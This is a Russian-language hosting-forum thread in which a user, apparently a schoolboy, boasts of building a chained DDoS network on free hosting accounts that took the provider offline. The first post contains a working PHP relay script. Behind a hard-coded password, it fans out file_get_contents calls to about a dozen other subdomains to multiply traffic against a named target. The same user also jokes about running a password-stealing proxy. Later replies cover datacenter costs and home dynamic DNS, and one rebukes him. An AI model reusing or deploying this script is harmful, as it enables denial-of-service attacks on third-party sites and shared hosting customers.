Страница 1 из 2

Доигрался

Добавлено: Вс июн 24, 2018 6:44 pm
doshka
Доброе время суток! SKYWEB, BATAREIKA... Этот день закончился фатально. У меня есть к Вам вопрос. Почему я только что положмил zzz аж на 15 минут??? Почему была ошибка БД "превышение 1120 пользователей"?
У меня есть вопрос и к уважаемой (я так понял) Мире, не знаю как по отчеству. Почему я, школьник из города Бровары, за 5 минут положил весь Ваш хостинг со всеми акаунтами на 15 минут? Да мне даже в голову не приходило, что я это сделаю. Посмотрите логи! Ваш хостирнг упал на 15 минут со всеми акаунтами!
А теперь у меня такой вопрос. Может ли сервис, который не может выдержать больше 1200 клиентов, называться хостингом? Не может...
Обращайтесь хоть в СБУ - Вы не хостинг, Вы шарлатаны. Вы только майнить и умеете. Потому что Ваш хостинг положил школьник из города Бровары. А теперь..
Вопрос 2 - почему Ваш хостинг такой плохой?
Что я сделал. Я организовал небольшой ддос-сервис по взлому сайтов. Для этого я использовал методы, которые мне дали skyweb и batareika. Подтверждение есть на форуме в удаленных темах. Правда, они давали советы для раскрутки сайта, но я их применил совсем по-другому.
Итак, как я это сделал. SKYWEB предложил для раскрутки сайта функцию file_get_contents... И эта функция сыграла в этот фатальный для многих хостингов день очень важную роль. Что я сделал? Я открыл сеть ддос-атак на основе этой функции.
Сеть работает следующим образом:
ГЛАВНЫЙ СЕРВЕР посылает сигнал 2 серверу, а второй сервер - еще двум. а еще 2 - ещем2 и так далее.

Код: Выделить всё

?php
$PASS=$_GET['pass']; 
$NAMES=$_GET['names'];
 if($PASS=='6tg654gryeryuy4u4h6u67uh5u7ie46drdtrfytfrtdE54ed54ed54eed54de54d54drdr5d5rededrdrdRrdrd54e4ecd45656fd45fe3') 
{file_get_contents('http://ARQQQQQQQQa.zzz.com.ua/ddos.php?q='.$NAMES.'&pass=rty546uy56uy54u6r67rt6r6r6r6r');
file_get_contents('http://ARQQQQQQQQb.zzz.com.ua/ddos.php?q='.$NAMES.'&pass=6gu467uh6t67tr67rt6r6r6r6r');
file_get_contents('http://ARQQQQQQQQc.zzz.com.ua/ddos.php?q='.$NAMES.'&pass=65h46yu6ui6h7ihh67tr67rt6r6r6r6r'); 
file_get_contents('http://ARQQQQQQQQd.zzz.com.ua/ddos.php?q='.$NAMES.'&pass=56bu46h64u68u66tr67rt6r6r6r6r'); 
file_get_contents('http://ARQQQQQQQQf.zzz.com.ua/ddos.php?q='.$NAMES.'&pass=65uy4h4u67tr67rt6r6r6r6r');
file_get_contents('http://ARQQQQQQQQg.zzz.com.ua/ddos.php?q='.$NAMES.'&pass=56uh64u6h7uh687t67tr67rt6r6r6r6r');
file_get_contents('http://ARQQQQQQQQh.zzz.com.ua/ddos.php?q='.$NAMES.'&pass=56uh6u867u86h67t67tr67rt6r6r6r6r');
file_get_contents('http://ARQQQQQQQQi.zzz.com.ua/ddos.php?q='.$NAMES.'&pass=65u7657u65u765u867t67t67tr67rt6r6r6r6r');
file_get_contents('http://ARQQQQQQQQj.zzz.com.ua/ddos.php?q='.$NAMES.'&pass=67yu5u756ut67tr67rt6r6r6r6r');
file_get_contents('http://ARQQQQQQQQk.zzz.com.ua/ddos.php?q='.$NAMES.'&pass=67u865u876hi67t67tr67rt6r6r6r6r');
file_get_contents('http://ARQQQQQQQQl.zzz.com.ua/ddos.php?q='.$NAMES.'&pass=7y5u77ut7uh67u7667t67t67tr67rt6r6r6r6r');
file_get_contents('http://ARQQQQQQQQe.zzz.com.ua/ddos.php?q='.$NAMES.'&pass=56uh66i67i67t67tr67rt6r6r6r6r'); 
}
else print("Site is under construction"); 
?> 
Этот скрипт был внедрен во все мои хостинги, которых я зарегистрировал очень много. В результате на цель дажна была произойти атака несколько терабайт.
Попробуйте из главного испытать скрипт:
http://smallddossector.zzz.com.ua/
И вот такая цепочка длилась недолго - на 10000 запросе выдало ошибку подключений. Я решил зайти на сайт zzz, который к сайту который я ломал не имеет вообще никакого отношения. И я увидел, что он упал. Упали также все хостинги всех платный и бесплатный сайтов на 15 минут!!! Да такого я ващеее не ожидал! В цепочке участвовали 150 серверов, включяяя те, которые не пренадлежал zzz. Поскольку пароль знаю только я, то сервис не мог использовать больше никто. Умно? И вот мой ддос-сервис онлайн обрушил zzz. Как это могло произойти? 10000 запросов в секунду обрушили такой крупный хостинг? Не поверю. А как же Ваши клиенты. Они же вместе взятые то больше 10000 запросов отправляют! И уважаемая Мира, скажите, почему когда я отправлял 10000 запросов в секунду сайту xaker26.info, УПАЛИ ВСЕ ВАШИ ХОСТИНГИ, ВКЛЮЧАЯ VIP (ПРОВЕРЯЛ)? КАК ЭТО МОГЛО ПРОИЗОЙТИ? SKYWEB, отпишитесь...

Доигрался

Добавлено: Вс июн 24, 2018 7:06 pm
doshka
Видите сколько просмотров моей темы? Это все тот же скрипт, что выше, работает!!!

Доигрался

Добавлено: Вс июн 24, 2018 7:22 pm
skyweb
Привет школьникам из города Бровары :)
Я не предлагал использовать file_get_contents(). Я даже не знал, что сокеты тут открыты. Правило такое - что не запрещено, то разрешено. Насчет всего остального - это к техподдержке. Я такой же пользователь как и Вы. Просто в перерыве от работы переключаюсь и набиваю посты. Если возьмут в ТП, буду помогать официально.

Доигрался

Добавлено: Вс июн 24, 2018 7:33 pm
doshka
А помните, Вы говорили мне, что датацентр построить невозможно? Судя по ресурсах, zzz стоит где-то на заводе.

Доигрался

Добавлено: Вс июн 24, 2018 7:53 pm
skyweb
с чего такая уверенность?

Доигрался

Добавлено: Вс июн 24, 2018 8:00 pm
skyweb
Есть крупные игроки на рынке датацентров. Hetzner например. Там более мелкие компании выкупают себе ресурсы (blade сервера). Хостинговые компании тоже редко строят своё. Проще арендовать стойку. Самому строить очень накладно. И я говорил про конкретно нашу страну, у нас с законами тяжело. Но даже в Европе себе такое могут позволить только очень большие компании. Так как сопутствующие расходы: резервное питание, кондиционирование, персонал, оптика... очень накладно все это.

Доигрался

Добавлено: Пн июн 25, 2018 6:50 am
batareika
Сходите как то на экскурсию к ним https://bemobile.ua/ - находятся недалеко от ст. м. Почайна в Киеве. Посмотрите как у них все организовано и представьте себе сколько это стоит построить и во сколько в месяц обходится обслуживание такого центра. Гарантирую, у Вас отобьет желание строить свой.

Доигрался

Добавлено: Пн июн 25, 2018 7:22 am
doshka
Да ну. У меня дома стоит сервер, с которого я захожу сюда. Я его использую как ПК. И кушает он всего 350 Вт.
Считаем. По наибольшему тарифу, (1000Вт/350 Вт)*160коп=2...........*160=457.14285714285714285714285714286 коп=4Грн.57Коп
За сутки 24*4.57=109ю71 Грн
За месяц 109.71*30=3291.428 Грн.
Но это при том, что: 1. сервер под рукой. 2. никто из него не может слить бд с переписками. 3. на сервер можно установить прокси, ворующее пароли :) 4. Такой сервер намного мощнее, чем VPS в несколькот раз.5. Главное - такой сервер пропускаем много гигабит в канале
НО есть проблема. Почему-то я не могу перекинуть или как сказать домен из freenom.com на мой сервер. У меня IP с модема динамический. А проводить сеть 100 Гб было бы дороговато по сравнению с сервером однако. Учитывая расширения PCI, можно бы было из нескольких провайдеров составить мост 2-4 Гб, но я сам же на работу не хожу а родители категорически против. Так что ограничусь модемом 3Gна скоросте 15кб/с
Я вот уже давно хочу покинуть все хостинги и сделать все у себя на сервере. Система Windows Server 2008 Vista, Wamp server. Подскажите как сделать на него перенаправление домена. Имя сервера в сети WIN-CLOC1B01UNG.v.dyach, так как изначально я из него делал домен, но сделать не получилось и его было видно в локальной сети а винтернете нет.

Доигрался

Добавлено: Пн июн 25, 2018 7:39 am
skyweb
У меня в дом заходит витая пара 100 мегабит. IP почти динамический, белый - но провайдер может поменять его в любой момент, по статике он не выпускает - только DHCP. Я купил себе роутер dlink б/у шный за 100 гривен. Производитель даёт один домен бесплатно на сервисе dlinkdyndns.org. Так я сделал себе вход снаружи по своему домену. Дальше просто пробросить порты и всё. У меня есть теперь доступ к веб-камере в квартире, чтобы проследить и поговорить если что с собакой и еще я удаленно запускаю робот-пылесос :) Статей в инете полно, читайте, пока есть время и возможность.

Доигрался

Добавлено: Пн июн 25, 2018 7:53 am
an01
Приветствую !
Doshka, исходя из твоих слов, ты положил хостинг. То есть, экспериментируя, ты завалил молодой развивающийся удобный для нас хостинг ...
Попробуй лучше сделать что-то полезное.